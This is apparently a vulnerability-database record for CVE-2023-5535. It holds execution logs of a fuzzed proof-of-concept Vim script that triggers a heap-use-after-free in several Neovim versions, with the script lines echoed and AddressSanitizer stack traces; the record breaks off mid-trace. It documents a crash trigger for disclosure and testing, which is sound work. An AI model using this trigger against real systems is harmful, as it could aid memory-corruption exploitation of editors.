{"uuid": "b3d6abc8-09f7-4656-8513-383455129222", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-5535", "type": "seen", "source": "https://gist.github.com/zhuozhenwei/87a0d93f99bcb4bc75fed39733932cb8", "content": "Command:\n./nvim-0.9.5 -u NONE -i NONE -n -m -X -V20 -e -s -S poc -c :qa!\n\nOutput:\nchdir(/home/zzw/Desktop/DATA/Exec_PoC/CVE-2023-5535)\nchdir(vim/)\nchdir(/home/zzw/Desktop/DATA/Exec_PoC/CVE-2023-5535)\nchdir(/home/zzw/Desktop/DATA/Exec_PoC/CVE-2023-5535)\nchdir(vim/)\nchdir(/home/zzw/Desktop/DATA/Exec_PoC/CVE-2023-5535)\nchdir(/home/zzw/Desktop/DATA/Exec_PoC/CVE-2023-5535)\nchdir(vim/)\nchdir(/home/zzw/Desktop/DATA/Exec_PoC/CVE-2023-5535)\nchdir(/home/zzw/Desktop/DATA/Exec_PoC/CVE-2023-5535)\nchdir(vim/)\nchdir(/home/zzw/Desktop/DATA/Exec_PoC/CVE-2023-5535)\nchdir(/home/zzw/Desktop/DATA/Exec_PoC/CVE-2023-5535)\nchdir(vim/)\nchdir(/home/zzw/Desktop/DATA/Exec_PoC/CVE-2023-5535)\nchdir(/home/zzw/Desktop/DATA/Exec_PoC/CVE-2023-5535)\nchdir(vim/)\nchdir(/home/zzw/Desktop/DATA/Exec_PoC/CVE-2023-5535)\nchdir(/home/zzw/Desktop/DATA/Exec_PoC/CVE-2023-5535)\nchdir(vim/)\nchdir(/home/zzw/Desktop/DATA/Exec_PoC/CVE-2023-5535)\nchdir(/home/zzw/Desktop/DATA/Exec_PoC/CVE-2023-5535)\nchdir(vim/)\nchdir(/home/zzw/Desktop/DATA/Exec_PoC/CVE-2023-5535)\nchdir(/home/zzw/Desktop/DATA/Exec_PoC/CVE-2023-5535)\nchdir(vim/)\nchdir(/home/zzw/Desktop/DATA/Exec_PoC/CVE-2023-5535)\nchdir(/home/zzw/Desktop/DATA/Exec_PoC/CVE-2023-5535)\nchdir(vim/)\nchdir(/home/zzw/Desktop/DATA/Exec_PoC/CVE-2023-5535)\nExecuting: aunmenu *\n\nExecuting: vnoremenu PopUp.Cut \"+x\n\nExecuting: vnoremenu PopUp.Copy \"+y\n\nExecuting: anoremenu PopUp.Paste \"+gP\n\nExecuting: vnoremenu PopUp.Paste \"+P\n\nExecuting: vnoremenu PopUp.Delete \"_x\n\nExecuting: nnoremenu PopUp.Select\\ All ggVG\n\nExecuting: vnoremenu PopUp.Select\\ All gg0oG$\n\nExecuting: inoremenu PopUp.Select\\ All VG\n\nExecuting: anoremenu PopUp.-1- \n\nExecuting: anoremenu PopUp.How-to\\ disable\\ mouse help disable-mouse\n\nExecuting: \n\nchdir(/home/zzw/Desktop/DATA/Exec_PoC/CVE-2023-5535)\nchdir(vim/)\nchdir(/home/zzw/Desktop/DATA/Exec_PoC/CVE-2023-5535)\nchdir(/home/zzw/Desktop/DATA/Exec_PoC/CVE-2023-5535)\nchdir(vim/)\nchdir(/home/zzw/Desktop/DATA/Exec_PoC/CVE-2023-5535)\nExecuting: so CVE-2023-5535_nvim\n\nline 0: sourcing \"CVE-2023-5535_nvim\"\nline 1: set noautoread\n\nline 2: comman!-narg=* Xexpr lexrgs>\n\nline 3: auto BufReadPre * exe\"sn\" ..expand(\"\") \n\nline 4: f` Xauto*****cmd_changelishar)\n\nExecuting command: \"vimglob() { while [ $# -ge 1 ]; do echo \"$1\"; shift; done }; vimglob >/tmp/nvim.zzw/YT9czt/0 ` Xauto*****cmd_changelishar)\"\n\n\nE79: Cannot expand wildcards\nline 5: cal\n\nError detected while processing command line..script /home/zzw/Desktop/DATA/Exec_PoC/CVE-2023-5535/CVE-2023-5535_nvim:\nline 5:\nE471: Argument required: cal\nline 6: edi Xerr\n\nchdir(/home/zzw/Desktop/DATA/Exec_PoC/CVE-2023-5535)\nchdir(/home/zzw/Desktop/DATA/Exec_PoC/CVE-2023-5535/)\nchdir(/home/zzw/Desktop/DATA/Exec_PoC/CVE-2023-5535)\nExecuting BufReadPre Autocommands for \"*\"\nautocommand exe\"sn\" ..expand(\"\") \n\nExecuting: exe\"sn\" ..expand(\"\") \n\nExecuting: sn2\n\nchdir(/home/zzw/Desktop/DATA/Exec_PoC/CVE-2023-5535)\nchdir(/home/zzw/Desktop/DATA/Exec_PoC/CVE-2023-5535/)\nchdir(/home/zzw/Desktop/DATA/Exec_PoC/CVE-2023-5535)\nExecuting: unlet! b:keymap_name\n\nline 6:\nE201: *ReadPre autocommands must not change current buffer\nline 7: Xexpr'Xfil<9a>2:4:o R\n\nline 7: lexrgs>\n\nline 7:\nE15: Invalid expression: rgs>\nline 8: sil0nse <87>orm0\n\nline 8:\nE492: Not an editor command: sil0nse <87>orm0\nline 9: siT0nex^Uauto BufReadPre^A* exe\"sn\" \n\nline 9:\nE33: No previous substitute regular expression\nline 10: g Xautocr)\n\nPattern not found: Xautocr)\nline 11: cal writefile(['X4estfile2:4:4'],'Xerr')\n\nline 12: edi Xerr\n\nchdir(/home/zzw/Desktop/DATA/Exec_PoC/CVE-2023-5535)\nchdir(/home/zzw/Desktop/DATA/Exec_PoC/CVE-2023-5535/)\nchdir(/home/zzw/Desktop/DATA/Exec_PoC/CVE-2023-5535)\nExecuting BufReadPre Autocommands for \"*\"\nautocommand exe\"sn\" ..expand(\"\") \n\nExecuting: exe\"sn\" ..expand(\"\") \n\nExecuting: sn4\n\nExecuting: unlet! b:keymap_name\n\nline 12: unlet! b:keymap_name\n\nline 13: Xexpr'Xtabnorm0R0\n\nline 13: lexrgs>\n\nline 13:\nE15: Invalid expression: rgs>\nline 14: wp@\n\nline 14:\nE142: File not written: Writing is disabled by 'write' option\nline 15: n4comman!-narg=*^WXexpr lorm^Vnorm0R0\n=================================================================\n==4169==ERROR: AddressSanitizer: heap-use-after-free on address 0x62700000a900 at pc 0x0000005c4f77 bp 0x7ffd95d70a40 sp 0x7ffd95d70a38\nREAD of size 4 at 0x62700000a900 thread T0\n #0 0x5c4f76 in editing_arg_idx /home/zzw/Desktop/neovim/build/../src/nvim/arglist.c:484:31\n #1 0x5c509c in check_arg_idx /home/zzw/Desktop/neovim/build/../src/nvim/arglist.c:495:30\n #2 0x5c983a in alist_check_arg_idx /home/zzw/Desktop/neovim/build/../src/nvim/arglist.c:327:7\n #3 0x5c4b20 in do_arglist /home/zzw/Desktop/neovim/build/../src/nvim/arglist.c:468:3\n #4 0x5c5c7b in ex_next /home/zzw/Desktop/neovim/build/../src/nvim/arglist.c:693:11\n #5 0x75457d in execute_cmd0 /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:1620:7\n #6 0x74be9c in do_one_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:2282:7\n #7 0x74703a in do_cmdline /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:578:20\n #8 0x9e86aa in do_source /home/zzw/Desktop/neovim/build/../src/nvim/runtime.c:2167:5\n #9 0x9e6daa in cmd_source /home/zzw/Desktop/neovim/build/../src/nvim/runtime.c:1717:14\n #10 0x9e6c8e in ex_source /home/zzw/Desktop/neovim/build/../src/nvim/runtime.c:1725:3\n #11 0x75457d in execute_cmd0 /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:1620:7\n #12 0x74be9c in do_one_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:2282:7\n #13 0x74703a in do_cmdline /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:578:20\n #14 0x749541 in do_cmdline_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:281:10\n #15 0x517cab in exe_commands /home/zzw/Desktop/neovim/build/../src/nvim/main.c:1899:5\n #16 0x5110a4 in main /home/zzw/Desktop/neovim/build/../src/nvim/main.c:578:5\n #17 0x7fdf01a8c082 in __libc_start_main /build/glibc-B3wQXB/glibc-2.31/csu/../csu/libc-start.c:308:16\n #18 0x467f6d in _start (/home/zzw/Desktop/EXE/nvim_exe/nvim-0.9.5-ASAN+0x467f6d)\n\n0x62700000a900 is located 0 bytes inside of 12456-byte region [0x62700000a900,0x62700000d9a8)\nfreed by thread T0 here:\n #0 0x4e042d in free (/home/zzw/Desktop/EXE/nvim_exe/nvim-0.9.5-ASAN+0x4e042d)\n #1 0x8a07c9 in xfree /home/zzw/Desktop/neovim/build/../src/nvim/memory.c:134:3\n #2 0x5dbb0c in free_buffer /home/zzw/Desktop/neovim/build/../src/nvim/buffer.c:867:5\n #3 0x5d9279 in close_buffer /home/zzw/Desktop/neovim/build/../src/nvim/buffer.c:696:5\n #4 0x5e9ed1 in wipe_buffer /home/zzw/Desktop/neovim/build/../src/nvim/buffer.c:4286:3\n #5 0x5e9d5d in buf_contents_changed /home/zzw/Desktop/neovim/build/../src/nvim/buffer.c:4269:5\n #6 0x7ac9d9 in buf_check_timestamp /home/zzw/Desktop/neovim/build/../src/nvim/fileio.c:4818:51\n #7 0x734a66 in do_ecmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds.c:2291:13\n #8 0x75c38f in do_exedit /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:5270:9\n #9 0x75f7aa in ex_edit /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:5200:3\n #10 0x75457d in execute_cmd0 /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:1620:7\n #11 0x74be9c in do_one_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:2282:7\n #12 0x74703a in do_cmdline /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:578:20\n #13 0x9e86aa in do_source /home/zzw/Desktop/neovim/build/../src/nvim/runtime.c:2167:5\n #14 0x9e6daa in cmd_source /home/zzw/Desktop/neovim/build/../src/nvim/runtime.c:1717:14\n #15 0x9e6c8e in ex_source /home/zzw/Desktop/neovim/build/../src/nvim/runtime.c:1725:3\n #16 0x75457d in execute_cmd0 /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:1620:7\n #17 0x74be9c in do_one_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:2282:7\n #18 0x74703a in do_cmdline /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:578:20\n #19 0x749541 in do_cmdline_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:281:10\n #20 0x517cab in exe_commands /home/zzw/Desktop/neovim/build/../src/nvim/main.c:1899:5\n #21 0x5110a4 in main /home/zzw/Desktop/neovim/build/../src/nvim/main.c:578:5\n #22 0x7fdf01a8c082 in __libc_start_main /build/glibc-B3wQXB/glibc-2.31/csu/../csu/libc-start.c:308:16\n\npreviously allocated by thread T0 here:\n #0 0x4e0822 in calloc (/home/zzw/Desktop/EXE/nvim_exe/nvim-0.9.5-ASAN+0x4e0822)\n #1 0x8a0803 in xcalloc /home/zzw/Desktop/neovim/build/../src/nvim/memory.c:148:15\n #2 0x5de2df in buflist_new /home/zzw/Desktop/neovim/build/../src/nvim/buffer.c:1835:11\n #3 0x5e9ab4 in buf_contents_changed /home/zzw/Desktop/neovim/build/../src/nvim/buffer.c:4235:19\n #4 0x7ac9d9 in buf_check_timestamp /home/zzw/Desktop/neovim/build/../src/nvim/fileio.c:4818:51\n #5 0x734a66 in do_ecmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds.c:2291:13\n #6 0x75c38f in do_exedit /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:5270:9\n #7 0x75f7aa in ex_edit /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:5200:3\n #8 0x75457d in execute_cmd0 /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:1620:7\n #9 0x74be9c in do_one_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:2282:7\n #10 0x74703a in do_cmdline /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:578:20\n #11 0x9e86aa in do_source /home/zzw/Desktop/neovim/build/../src/nvim/runtime.c:2167:5\n #12 0x9e6daa in cmd_source /home/zzw/Desktop/neovim/build/../src/nvim/runtime.c:1717:14\n #13 0x9e6c8e in ex_source /home/zzw/Desktop/neovim/build/../src/nvim/runtime.c:1725:3\n #14 0x75457d in execute_cmd0 /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:1620:7\n #15 0x74be9c in do_one_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:2282:7\n #16 0x74703a in do_cmdline /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:578:20\n #17 0x749541 in do_cmdline_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:281:10\n #18 0x517cab in exe_commands /home/zzw/Desktop/neovim/build/../src/nvim/main.c:1899:5\n #19 0x5110a4 in main /home/zzw/Desktop/neovim/build/../src/nvim/main.c:578:5\n #20 0x7fdf01a8c082 in __libc_start_main /build/glibc-B3wQXB/glibc-2.31/csu/../csu/libc-start.c:308:16\n\nSUMMARY: AddressSanitizer: heap-use-after-free /home/zzw/Desktop/neovim/build/../src/nvim/arglist.c:484:31 in editing_arg_idx\nShadow bytes around the buggy address:\n 0x0c4e7fff94d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n 0x0c4e7fff94e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n 0x0c4e7fff94f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n 0x0c4e7fff9500: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n 0x0c4e7fff9510: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n=>0x0c4e7fff9520:[fd]fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\n 0x0c4e7fff9530: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\n 0x0c4e7fff9540: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\n 0x0c4e7fff9550: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\n 0x0c4e7fff9560: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\n 0x0c4e7fff9570: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\nShadow byte legend (one shadow byte represents 8 application bytes):\n Addressable: 00\n Partially addressable: 01 02 03 04 05 06 07 \n Heap left redzone: fa\n Freed heap region: fd\n Stack left redzone: f1\n Stack mid redzone: f2\n Stack right redzone: f3\n Stack after return: f5\n Stack use after scope: f8\n Global redzone: f9\n Global init order: f6\n Poisoned by user: f7\n Container overflow: fc\n Array cookie: ac\n Intra object redzone: bb\n ASan internal: fe\n Left alloca redzone: ca\n Right alloca redzone: cb\n Shadow gap: cc\n==4169==ABORTING\n\n\nCommand:\n./nvim-0.6.1 -u NONE -i NONE -n -m -X -V20 -e -s -S poc -c :qa!\n\nOutput:\nExecuting: augroup nvim_terminal\n\nExecuting: autocmd BufReadCmd term://* ++nested if !exists('b:term_title')|call termopen(matchstr(expand(\"\"), '\\c\\mterm://\\%(.\\{-}//\\%(\\d\\+:\\)\\?\\)\\?\\zs.*'), {'cwd': expand(get(matchlist(expand(\"\"), '\\c\\mterm://\\(.\\{-}\\)//'), 1, ''))})|endif\n\nExecuting: augroup END\n\nExecuting: augroup nvim_cmdwin\n\nExecuting: autocmd! CmdwinEnter [:>] syntax sync minlines=1 maxlines=1\n\nExecuting: augroup END\n\nExecuting: so CVE-2023-5535_nvim\n\nline 0: sourcing \"CVE-2023-5535_nvim\"\nline 1: set noautoread\n\nline 2: comman!-narg=* Xexpr lexrgs>\n\nline 3: auto BufReadPre * exe\"sn\" ..expand(\"\") \n\nline 4: f` Xauto*****cmd_changelishar)\n\nExecuting command: \"set nonomatch; vimglob() { while [ $# -ge 1 ]; do echo \"$1\"; shift; done }; vimglob >/tmp/nvim5hf6dU/1 ` Xauto*****cmd_changelishar)\"\n\n\nE79: Cannot expand wildcards\nline 5: cal\n\nError detected while processing /home/zzw/Desktop/DATA/Exec_PoC/CVE-2023-5535/CVE-2023-5535_nvim:\nline 5:\nE471: Argument required: cal\nline 6: edi Xerr\n\nchdir(/home/zzw/Desktop/DATA/Exec_PoC/CVE-2023-5535)\nchdir(/home/zzw/Desktop/DATA/Exec_PoC/CVE-2023-5535)\nchdir(/home/zzw/Desktop/DATA/Exec_PoC/CVE-2023-5535)\nline 6:\nE201: *ReadPre autocommands must not change current buffer\nline 7: Xexpr'Xfil<9a>2:4:o R\n\nline 7: verboselexrgs>\n\nline 7:\nE492: Not an editor command: verboselexrgs>\nline 8: sil0nse <87>orm0\n\nline 8:\nE492: Not an editor command: sil0nse <87>orm0\nline 9: siT0nex^Uauto BufReadPre^A* exe\"sn\" \n\nline 9:\nE33: No previous substitute regular expression\nline 10: g Xautocr)\n\nPattern not found: Xautocr)\nline 11: cal writefile(['X4estfile2:4:4'],'Xerr')\n\nline 12: edi Xerr\n\nchdir(/home/zzw/Desktop/DATA/Exec_PoC/CVE-2023-5535)\nchdir(/home/zzw/Desktop/DATA/Exec_PoC/CVE-2023-5535)\nchdir(/home/zzw/Desktop/DATA/Exec_PoC/CVE-2023-5535)\nExecuting BufReadPre Autocommands for \"*\"\nautocommand exe\"sn\" ..expand(\"\") \n\nExecuting: exe\"sn\" ..expand(\"\") \n\nExecuting: sn4\n\nExecuting: unlet! b:keymap_name\n\nline 12: unlet! b:keymap_name\n\nline 13: Xexpr'Xtabnorm0R0\n\nline 13: verboselexrgs>\n\nline 13:\nE492: Not an editor command: verboselexrgs>\nline 14: wp@\n\nline 14:\nE142: File not written: Writing is disabled by 'write' option\nline 15: n4comman!-narg=*^WXexpr lorm^Vnorm0R0\n=================================================================\n==4241==ERROR: AddressSanitizer: heap-use-after-free on address 0x627000018900 at pc 0x0000008dcea4 bp 0x7fff2d087620 sp 0x7fff2d087618\nREAD of size 4 at 0x627000018900 thread T0\n #0 0x8dcea3 in editing_arg_idx /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds2.c:1010:31\n #1 0x8dc46a in check_arg_idx /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds2.c:1020:30\n #2 0x8f0101 in alist_check_arg_idx /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds2.c:1000:7\n #3 0x8e0837 in do_arglist /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds2.c:990:3\n #4 0x8de246 in ex_next /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds2.c:1205:11\n #5 0x901cb0 in do_one_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:1983:5\n #6 0x8f40b2 in do_cmdline /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:604:20\n #7 0x8e8b1c in do_source /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds2.c:2242:5\n #8 0x8e57f2 in cmd_source /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds2.c:1805:14\n #9 0x8e5dd0 in ex_source /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds2.c:1786:3\n #10 0x901cb0 in do_one_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:1983:5\n #11 0x8f40b2 in do_cmdline /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:604:20\n #12 0x8f7a53 in do_cmdline_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:288:10\n #13 0xabfaae in exe_commands /home/zzw/Desktop/neovim/build/../src/nvim/main.c:1654:5\n #14 0xab8096 in main /home/zzw/Desktop/neovim/build/../src/nvim/main.c:493:5\n #15 0x7f601dbfa082 in __libc_start_main /build/glibc-B3wQXB/glibc-2.31/csu/../csu/libc-start.c:308:16\n #16 0x45df4d in _start (/home/zzw/Desktop/EXE/nvim_exe/nvim-0.6.1-ASAN+0x45df4d)\n\n0x627000018900 is located 0 bytes inside of 12392-byte region [0x627000018900,0x62700001b968)\nfreed by thread T0 here:\n #0 0x4d640d in free (/home/zzw/Desktop/EXE/nvim_exe/nvim-0.6.1-ASAN+0x4d640d)\n #1 0xb5f304 in xfree /home/zzw/Desktop/neovim/build/../src/nvim/memory.c:122:3\n #2 0x66b404 in free_buffer /home/zzw/Desktop/neovim/build/../src/nvim/buffer.c:777:5\n #3 0x66792c in close_buffer /home/zzw/Desktop/neovim/build/../src/nvim/buffer.c:610:5\n #4 0x691be6 in wipe_buffer /home/zzw/Desktop/neovim/build/../src/nvim/buffer.c:5591:3\n #5 0x691abc in buf_contents_changed /home/zzw/Desktop/neovim/build/../src/nvim/buffer.c:5574:5\n #6 0x9dadd1 in buf_check_timestamp /home/zzw/Desktop/neovim/build/../src/nvim/fileio.c:4967:51\n #7 0x8b09f6 in do_ecmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds.c:2455:13\n #8 0x923635 in do_exedit /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:7489:9\n #9 0x937528 in ex_edit /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:7416:3\n #10 0x901cb0 in do_one_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:1983:5\n #11 0x8f40b2 in do_cmdline /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:604:20\n #12 0x8e8b1c in do_source /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds2.c:2242:5\n #13 0x8e57f2 in cmd_source /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds2.c:1805:14\n #14 0x8e5dd0 in ex_source /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds2.c:1786:3\n #15 0x901cb0 in do_one_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:1983:5\n #16 0x8f40b2 in do_cmdline /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:604:20\n #17 0x8f7a53 in do_cmdline_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:288:10\n #18 0xabfaae in exe_commands /home/zzw/Desktop/neovim/build/../src/nvim/main.c:1654:5\n #19 0xab8096 in main /home/zzw/Desktop/neovim/build/../src/nvim/main.c:493:5\n #20 0x7f601dbfa082 in __libc_start_main /build/glibc-B3wQXB/glibc-2.31/csu/../csu/libc-start.c:308:16\n\npreviously allocated by thread T0 here:\n #0 0x4d6802 in calloc (/home/zzw/Desktop/EXE/nvim_exe/nvim-0.6.1-ASAN+0x4d6802)\n #1 0xb5f39e in xcalloc /home/zzw/Desktop/neovim/build/../src/nvim/memory.c:136:15\n #2 0x67017c in buflist_new /home/zzw/Desktop/neovim/build/../src/nvim/buffer.c:1733:11\n #3 0x69171f in buf_contents_changed /home/zzw/Desktop/neovim/build/../src/nvim/buffer.c:5540:19\n #4 0x9dadd1 in buf_check_timestamp /home/zzw/Desktop/neovim/build/../src/nvim/fileio.c:4967:51\n #5 0x8b09f6 in do_ecmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds.c:2455:13\n #6 0x923635 in do_exedit /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:7489:9\n #7 0x937528 in ex_edit /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:7416:3\n #8 0x901cb0 in do_one_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:1983:5\n #9 0x8f40b2 in do_cmdline /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:604:20\n #10 0x8e8b1c in do_source /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds2.c:2242:5\n #11 0x8e57f2 in cmd_source /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds2.c:1805:14\n #12 0x8e5dd0 in ex_source /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds2.c:1786:3\n #13 0x901cb0 in do_one_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:1983:5\n #14 0x8f40b2 in do_cmdline /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:604:20\n #15 0x8f7a53 in do_cmdline_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:288:10\n #16 0xabfaae in exe_commands /home/zzw/Desktop/neovim/build/../src/nvim/main.c:1654:5\n #17 0xab8096 in main /home/zzw/Desktop/neovim/build/../src/nvim/main.c:493:5\n #18 0x7f601dbfa082 in __libc_start_main /build/glibc-B3wQXB/glibc-2.31/csu/../csu/libc-start.c:308:16\n\nSUMMARY: AddressSanitizer: heap-use-after-free /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds2.c:1010:31 in editing_arg_idx\nShadow bytes around the buggy address:\n 0x0c4e7fffb0d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n 0x0c4e7fffb0e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n 0x0c4e7fffb0f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n 0x0c4e7fffb100: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n 0x0c4e7fffb110: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n=>0x0c4e7fffb120:[fd]fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\n 0x0c4e7fffb130: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\n 0x0c4e7fffb140: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\n 0x0c4e7fffb150: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\n 0x0c4e7fffb160: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\n 0x0c4e7fffb170: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\nShadow byte legend (one shadow byte represents 8 application bytes):\n Addressable: 00\n Partially addressable: 01 02 03 04 05 06 07 \n Heap left redzone: fa\n Freed heap region: fd\n Stack left redzone: f1\n Stack mid redzone: f2\n Stack right redzone: f3\n Stack after return: f5\n Stack use after scope: f8\n Global redzone: f9\n Global init order: f6\n Poisoned by user: f7\n Container overflow: fc\n Array cookie: ac\n Intra object redzone: bb\n ASan internal: fe\n Left alloca redzone: ca\n Right alloca redzone: cb\n Shadow gap: cc\n==4241==ABORTING\n\n\n\nCommand:\n./nvim-0.5.1 -u NONE -i NONE -n -m -X -V20 -e -s -S poc -c :qa!\n\nOutput:\nExecuting: augroup nvim_terminal\n\nExecuting: autocmd!\n\nExecuting: autocmd BufReadCmd term://* nested :if !exists('b:term_title')|call termopen( matchstr(expand(\"\"), '\\c\\mterm://\\%(.\\{-}//\\%(\\d\\+:\\)\\?\\)\\?\\zs.*'), {'cwd': expand(get(matchlist(expand(\"\"), '\\c\\mterm://\\(.\\{-}\\)//'), 1, ''))})|endif\n\nExecuting: augroup END\n\nExecuting: so CVE-2023-5535_nvim\n\nline 0: sourcing \"CVE-2023-5535_nvim\"\nline 1: set noautoread\n\nline 2: comman!-narg=* Xexpr lexrgs>\n\nline 3: auto BufReadPre * exe\"sn\" ..expand(\"\") \n\nline 4: f` Xauto*****cmd_changelishar)\n\nExecuting command: \"set nonomatch; vimglob() { while [ $# -ge 1 ]; do echo \"$1\"; shift; done }; vimglob >/tmp/nvimqACnBH/1 ` Xauto*****cmd_changelishar)\"\n\n\nE79: Cannot expand wildcards\nline 5: cal\n\nError detected while processing /home/zzw/Desktop/DATA/Exec_PoC/CVE-2023-5535/CVE-2023-5535_nvim:\nline 5:\nE471: Argument required: cal\nline 6: edi Xerr\n\nchdir(/home/zzw/Desktop/DATA/Exec_PoC/CVE-2023-5535)\nchdir(/home/zzw/Desktop/DATA/Exec_PoC/CVE-2023-5535)\nchdir(/home/zzw/Desktop/DATA/Exec_PoC/CVE-2023-5535)\nline 6:\nE201: *ReadPre autocommands must not change current buffer\nline 7: Xexpr'Xfil<9a>2:4:o R\n\nline 7: verboselexrgs>\n\nline 7:\nE492: Not an editor command: verboselexrgs>\nline 8: sil0nse <87>orm0\n\nline 8:\nE492: Not an editor command: sil0nse <87>orm0\nline 9: siT0nex^Uauto BufReadPre^A* exe\"sn\" \n\nline 9:\nE33: No previous substitute regular expression\nline 10: g Xautocr)\n\nPattern not found: Xautocr)\nline 11: cal writefile(['X4estfile2:4:4'],'Xerr')\n\nline 12: edi Xerr\n\nchdir(/home/zzw/Desktop/DATA/Exec_PoC/CVE-2023-5535)\nchdir(/home/zzw/Desktop/DATA/Exec_PoC/CVE-2023-5535)\nchdir(/home/zzw/Desktop/DATA/Exec_PoC/CVE-2023-5535)\nExecuting BufReadPre Autocommands for \"*\"\nautocommand exe\"sn\" ..expand(\"\") \n\nExecuting: exe\"sn\" ..expand(\"\") \n\nExecuting: sn4\n\nExecuting: unlet! b:keymap_name\n\nline 12: unlet! b:keymap_name\n\nline 13: Xexpr'Xtabnorm0R0\n\nline 13: verboselexrgs>\n\nline 13:\nE492: Not an editor command: verboselexrgs>\nline 14: wp@\n\nline 14:\nE142: File not written: Writing is disabled by 'write' option\nline 15: n4comman!-narg=*^WXexpr lorm^Vnorm0R0\n=================================================================\n==4291==ERROR: AddressSanitizer: heap-use-after-free on address 0x627000015100 at pc 0x0000008b6264 bp 0x7fff17e4d080 sp 0x7fff17e4d078\nREAD of size 4 at 0x627000015100 thread T0\n #0 0x8b6263 in editing_arg_idx /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds2.c:1843:31\n #1 0x8b582a in check_arg_idx /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds2.c:1854:30\n #2 0x8c9461 in alist_check_arg_idx /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds2.c:1833:7\n #3 0x8b9bf7 in do_arglist 